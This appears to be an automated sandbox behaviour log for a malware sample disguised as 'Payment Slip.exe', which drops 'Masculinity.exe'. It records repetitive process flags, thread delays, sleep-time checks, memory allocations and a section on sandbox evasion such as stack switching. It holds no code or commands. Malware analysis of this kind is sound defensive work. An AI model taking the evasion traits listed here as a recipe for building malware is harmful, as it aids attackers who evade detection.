Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe

API/Special instruction interceptor: Address: 2B447A9

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Memory allocated: 20E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Memory allocated: 20C80000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595030	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 594484	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7503	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2173	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Window / User API: threadDelayed 928	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Window / User API: threadDelayed 8919	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe

API coverage: 1.0 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5788	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 5892	Thread sleep count: 928 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 5892	Thread sleep count: 8919 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598391s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595030s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -594594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -594484s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Payment Slip.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
